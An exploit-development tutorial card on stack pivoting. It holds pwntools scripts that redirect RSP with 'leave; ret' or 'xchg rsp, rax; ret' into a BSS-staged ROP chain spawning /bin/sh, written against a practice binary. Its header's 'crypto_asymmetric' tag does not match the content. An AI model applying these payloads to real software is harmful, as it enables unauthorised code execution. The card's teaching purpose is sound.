Stack Pivot Technique: RSP Redirection to Attacker-Controlled Memory for Extended ROP Chain Execution

crypto_asymmetric Difficulty 1–5 30 min certifiable

Theory

Why This Matters

Stack pivoting is needed when the overflow on the original stack is too small to hold a complete ROP chain. This happens when the read size is constrained (e.g., only 16 bytes can be written past the buffer), or when the overflow reaches only the saved RBP and return address and leaves no room for further gadgets or their arguments. The solution is to redirect RSP to a larger attacker-controlled region (the heap, the BSS, or a mapped buffer) where the full chain has already been written. NICE K0168 (exploit code) and S0131 (develop exploits) require knowing the two primary pivot gadgets (xchg rsp, rax; ret and leave; ret) and how to combine them with a prior write primitive to stage a complete chain at a known, writable address.

Core Concept

A stack pivot redirects RSP from its current value to an attacker-controlled address. After the pivot, all subsequent ret instructions use the new RSP, executing gadgets from the controlled memory region.

Primary pivot gadgets:

xchg rsp, rax; ret: swaps RSP and RAX. If RAX is loaded with the target address (e.g., via a prior pop rax; ret gadget, or because a function returned a heap pointer in RAX), this redirects the stack to that address.
leave; ret: equivalent to mov rsp, rbp; pop rbp; ret. When RBP is controlled (e.g., via a saved-RBP overwrite in the overflow), leave sets RSP to RBP, then pop rbp loads the qword at the new RSP into RBP. The subsequent ret pops the next qword as the new RIP. The qword at the address held in RBP is therefore junk consumed by pop rbp, and the qword at that address + 8 is the first gadget of the chain.
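The register effects of the two gadgets can be sketched with a toy model. This is only an illustration: memory is a Python dict of 8-byte slots, and the addresses (TARGET, the gadget values) are hypothetical, not taken from any real binary.

```python
# Toy model of the two pivot gadgets. Memory is a dict mapping an address
# to the 8-byte value stored there. All addresses are made up for illustration.

def leave_ret(mem, regs):
    """Model `leave; ret`, i.e. mov rsp, rbp; pop rbp; ret."""
    regs = dict(regs)
    regs["rsp"] = regs["rbp"]        # mov rsp, rbp
    regs["rbp"] = mem[regs["rsp"]]   # pop rbp (consumes the junk qword)
    regs["rsp"] += 8
    regs["rip"] = mem[regs["rsp"]]   # ret (takes the first gadget)
    regs["rsp"] += 8
    return regs

def xchg_rsp_rax_ret(mem, regs):
    """Model `xchg rsp, rax; ret`."""
    regs = dict(regs)
    regs["rsp"], regs["rax"] = regs["rax"], regs["rsp"]  # swap the registers
    regs["rip"] = mem[regs["rsp"]]   # ret pops from the new stack
    regs["rsp"] += 8
    return regs

TARGET = 0x404100                    # hypothetical controlled region
mem = {
    TARGET:      0xdeadbeef,         # junk for pop rbp
    TARGET + 8:  0x401111,           # first gadget (hypothetical)
    TARGET + 16: 0x402222,           # next qword of the chain
}
start = {"rsp": 0x7ffd0000, "rbp": TARGET, "rax": TARGET + 8, "rip": 0}

after_leave = leave_ret(mem, start)
after_xchg = xchg_rsp_rax_ret(mem, start)
```

Note the difference the model makes visible: with leave; ret the controlled register points at the junk qword, while with xchg rsp, rax; ret it points directly at the first gadget.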

Chain structure with leave; ret pivot:

On original stack (small overflow allows writing RBP + RIP):
  [RBP overwrite] = target_region       (leave sets RSP to this; pop rbp then consumes the junk qword at target_region)
  [RIP overwrite] = address of "leave; ret" gadget

At target_region (heap/BSS, pre-written with full chain):
  [target_region + 0x00] = junk for pop rbp (consumed by leave's pop rbp)
  [target_region + 0x08] = first real gadget address
  [target_region + 0x10] = first gadget argument
  ...
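As a rough sketch of that layout in bytes, the following builds both pieces with only the standard library. The local p64 helper stands in for the pwntools function of the same name, and buf_len, the target address, and the chain values are hypothetical examples.

```python
import struct

def p64(value):
    """Pack a 64-bit little-endian qword (stand-in for pwntools' p64)."""
    return struct.pack("<Q", value)

def build_leave_pivot(buf_len, target, leave_ret_addr, chain):
    """Return (overflow, region) for a leave; ret pivot.

    overflow goes to the vulnerable input; region must already be stored
    at `target` by some earlier write primitive.
    """
    overflow = b"A" * buf_len          # fill up to the saved RBP
    overflow += p64(target)            # saved RBP: points at the junk qword
    overflow += p64(leave_ret_addr)    # saved RIP: the pivot gadget
    region = p64(0)                    # junk consumed by pop rbp
    region += b"".join(p64(q) for q in chain)
    return overflow, region

# Hypothetical values for illustration only.
overflow, region = build_leave_pivot(
    buf_len=16,
    target=0x404100,
    leave_ret_addr=0x401234,
    chain=[0x401263, 0x0],             # e.g. pop rdi; ret and its argument
)
```

Only 16 bytes past the buffer are needed on the original stack; everything else lives in the target region.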

Setting up the target region: write the full ROP chain to a known address before triggering the pivot. Common methods:
- Write to BSS via a format string %n write or a prior read(stdin, bss, N) call in the ROP chain.
- The heap (if a heap allocation at a known offset from the heap base was made and the heap base is known).
- An mmap'd region (if the binary maps writable memory at a known address; it does not need to be executable, because the chain is data that ret consumes).

Technical Deep-Dive

from pwn import *

elf  = ELF('./stack_pivot')
libc = ELF('./libc.so.6')
p    = process('./stack_pivot')

# After libc leak (standard ret2libc leak stage):
libc.address = 0x7f1234560000  # example

# ── Gadgets ──────────────────────────────────────────────────────────────
leave_ret    = 0x401234        # leave; ret  (in binary)
pop_rax_ret  = libc.address + 0x36174   # pop rax; ret
xchg_rsp_rax = libc.address + 0x54d27  # xchg rsp, rax; ret

# ── Target region: BSS area (writable, known address) ────────────────────
bss_chain    = elf.bss() + 0x100       # start of chain in BSS

# ── Build the full ROP chain to write at bss_chain ───────────────────────
pop_rdi   = libc.address + 0x23b6a
pop_rsi   = libc.address + 0x2601f
pop_rdx   = libc.address + 0x142c92
syscall   = libc.address + 0x630d9
binsh     = next(libc.search(b'/bin/sh'))

full_chain  = p64(pop_rdi)  + p64(binsh)
full_chain += p64(pop_rsi)  + p64(0)
full_chain += p64(pop_rdx)  + p64(0)
full_chain += p64(pop_rax_ret) + p64(59)
full_chain += p64(syscall)

# ── Stage 1: get full_chain into BSS ─────────────────────────────────────
# The chain must already be stored at bss_chain before the pivot fires, e.g.
# via read(0, bss_chain, len(full_chain)) issued from an earlier short ROP
# stage, or via another write primitive. That step is binary-specific and is
# omitted from this simplified illustration.

# ── Stage 2: pivot to BSS chain ──────────────────────────────────────────
buf_len = 16                             # bytes from buffer start to saved RBP (example)

# Method A: xchg rsp, rax. RAX must hold bss_chain when the gadget runs.
# read() returns the byte count in RAX, not the buffer address, so load RAX
# explicitly with pop rax. This needs three qwords from the saved RIP onward.
pivot_payload  = b'A' * buf_len
pivot_payload += p64(0)                  # saved RBP (not used by this method)
pivot_payload += p64(pop_rax_ret) + p64(bss_chain)
pivot_payload += p64(xchg_rsp_rax)       # RSP = bss_chain; ret runs the first gadget there

# Method B: leave; ret. Only saved RBP and saved RIP are overwritten.
# full_chain starts at bss_chain with no junk qword in front of it, so RBP is
# set 8 bytes lower: leave sets RSP = bss_chain - 8, pop rbp consumes that
# qword, and ret takes the first gadget from bss_chain.
pivot_payload2  = b'A' * buf_len
pivot_payload2 += p64(bss_chain - 8)     # saved RBP
pivot_payload2 += p64(leave_ret)         # saved RIP: execute leave; ret

p.sendline(pivot_payload2)
p.interactive()

Finding xchg rsp, rax; ret:

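ROPgadget --binary ./stack_pivot | grep -E "xchg (rsp, rax|rax, rsp)"
# If not found in binary, search libc:
ROPgadget --binary ./libc.so.6 | grep -E "xchg (rsp, rax|rax, rsp)"
# 32-bit form: in 64-bit code it zero-extends into RSP, so it only works for targets below 4 GiB
ROPgadget --binary ./libc.so.6 | grep -E "xchg (esp, eax|eax, esp)"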
# Or use: push rax; pop rsp; ret (equivalent effect)
ROPgadget --binary ./libc.so.6 | grep "push rax" | grep "pop rsp"
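When a gadget tool is not at hand, the same search can be approximated by scanning raw bytes for the shortest encodings of these gadgets. The sketch below is a rough stand-in, not a replacement for ROPgadget: it covers only one encoding per gadget, reports offsets into the byte string rather than virtual addresses, and the sample blob is fabricated.

```python
# Shortest encodings of the pivot gadgets discussed above.
PIVOT_PATTERNS = {
    "xchg rax, rsp; ret":     bytes.fromhex("4894c3"),  # REX.W xchg; ret
    "push rax; pop rsp; ret": bytes.fromhex("505cc3"),
    "leave; ret":             bytes.fromhex("c9c3"),
}

def find_pivots(blob):
    """Return {gadget name: [offsets]} for every pattern occurrence in blob."""
    hits = {}
    for name, pattern in PIVOT_PATTERNS.items():
        offsets = []
        pos = blob.find(pattern)
        while pos != -1:
            offsets.append(pos)
            pos = blob.find(pattern, pos + 1)
        hits[name] = offsets
    return hits

# Fabricated sample: two nops, an xchg pivot, push rbp, then leave; ret.
sample = bytes.fromhex("9090" "4894c3" "55" "c9c3")
hits = find_pivots(sample)
```

To scan a real file, pass open(path, "rb").read() as blob and translate each offset to a virtual address using the section headers.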

BSS chain writing via read syscall in ROP:

# Compact ROP to call read(0, bss_chain, 0x100):
pop_rdi = 0x401263
pop_rsi_r15 = 0x401261   # pop rsi; pop r15; ret (common in __libc_csu_init)
read_plt = elf.plt['read']

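# offset = distance from the buffer start to the saved RIP
stage1  = b'A' * (offset - 8)
stage1 += p64(bss_chain - 8)                 # saved RBP: the final leave; ret pivots here
stage1 += p64(pop_rdi)     + p64(0)          # fd = stdin
stage1 += p64(pop_rsi_r15) + p64(bss_chain) + p64(0)  # buf = bss_chain, r15 = 0
# rdx (read count) is not set here: rely on a large enough leftover value,
# or add a pop rdx gadget or the __libc_csu_init sequence
stage1 += p64(read_plt)    # call read() -- waits for input
stage1 += p64(leave_ret)   # pivot after read returns (RBP is callee-saved, still bss_chain - 8)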

p.sendline(stage1)
p.send(full_chain)         # write full chain to BSS via stdin
p.interactive()

Reverse Engineering Methodology

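Determine the available overflow size: take offset = cyclic_find(value that landed in RIP), the distance from the buffer start to the saved return address. The space from the return address onward is read_count - offset. If that is only 8 bytes (just the saved RBP and RIP are overwritable, 16 bytes in total), leave; ret is usually the only practical pivot, because xchg rsp, rax; ret additionally needs RAX to hold a controlled pointer already.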
Find leave; ret gadget: ROPgadget --binary ./binary | grep "leave". It appears in the function epilogues of most binaries compiled with frame pointers.
Identify the target region for the full chain: prefer BSS (always present, known address, writable, not randomised on non-PIE). Use readelf -S ./binary | grep bss for the address.
Verify the pivot in GDB: set a breakpoint at leave, run to it, inspect RSP before and after, confirm RSP moves to the target region. Then step through the full chain.
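The arithmetic behind the first step can be sketched as follows. The function names and the example numbers are illustrative assumptions; offset_to_rip is the value cyclic_find reports for the saved return address.

```python
def overflow_budget(read_count, offset_to_rip):
    """Return (room, extra_qwords).

    room is the number of controlled bytes from the saved return address
    onward; extra_qwords is how many full qwords fit after that address.
    """
    room = max(0, read_count - offset_to_rip)
    extra_qwords = max(0, room - 8) // 8
    return room, extra_qwords

def pivot_options(read_count, offset_to_rip):
    """List the pivots that fit, assuming the saved RBP is also overwritten."""
    room, extra = overflow_budget(read_count, offset_to_rip)
    options = []
    if room >= 8:
        options.append("leave; ret")  # needs only saved RBP + saved RIP
    if extra >= 2:
        # pop rax; ret, the target value, then xchg rsp, rax; ret
        options.append("pop rax; ret + xchg rsp, rax; ret")
    return options

# Example: 16-byte buffer, saved RBP at offset 16, saved RIP at offset 24.
tight = pivot_options(read_count=32, offset_to_rip=24)
roomy = pivot_options(read_count=48, offset_to_rip=24)
```

With a 32-byte read only leave; ret fits; a 48-byte read leaves room for the three-qword xchg sequence as well.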

Common Reversing Errors

leave; ret pivoting 8 bytes too early: leave does mov rsp, rbp; pop rbp. The pop rbp consumes 8 bytes from the new RSP. The first gadget of the chain is at target + 8, not target + 0. Place a junk qword at target and start the real chain at target + 8.
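BSS address colliding with existing data: the BSS section holds zero-initialised globals, so a ROP chain written into the middle of it may overwrite a global the program still uses. Use elf.bss() + 0x200 or a higher offset that still lies inside the mapped writable page, and leave space below the chain, because functions called from the chain push their frames below the pivoted RSP.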
xchg rsp, rax uses the wrong RAX value: xchg rsp, rax uses RAX at the moment of execution, not a value set earlier in the chain. If a function call between setting RAX and the xchg clobbers RAX (e.g., puts() returns a length in RAX), the pivot target is wrong. Arrange the pivot immediately after loading the target into RAX.
Malformed chain data in the target region: after leave; ret, the qword at target + 8 must be a valid gadget address, and every entry must be a full 8-byte little-endian qword. A chain written at the wrong offset, with the wrong byte order, or with a truncated entry makes the pivoted execution jump to an invalid address.
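Several of these mistakes can be caught before sending anything by checking the bytes destined for the target region. The checker below is a minimal sketch for the leave; ret layout (junk qword first, first gadget at target + 8); the function name and sample values are hypothetical.

```python
import struct

def check_region(region, first_gadget):
    """Return a list of problems found in a leave; ret target region image."""
    problems = []
    if len(region) % 8 != 0:
        problems.append("length is not a multiple of 8")
    if len(region) < 16:
        problems.append("too short for junk qword plus first gadget")
        return problems
    # The qword at offset 8 is what ret will load into RIP after the pivot.
    (slot,) = struct.unpack_from("<Q", region, 8)
    if slot != first_gadget:
        problems.append(
            f"qword at target + 8 is {slot:#x}, expected {first_gadget:#x}"
        )
    return problems

FIRST = 0x401263                                   # hypothetical gadget address
good = struct.pack("<QQQ", 0, FIRST, 0)            # junk, gadget, argument
wrong_order = struct.pack(">QQQ", 0, FIRST, 0)     # big-endian by mistake
no_junk = struct.pack("<QQ", FIRST, 0)             # chain starts 8 bytes too early
```

Calling check_region on good returns an empty list, while the other two samples each report that the qword at target + 8 is not the expected gadget.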

Challenge Lab

Reinforce your learning with a hands-on generated challenge based on this card's competency.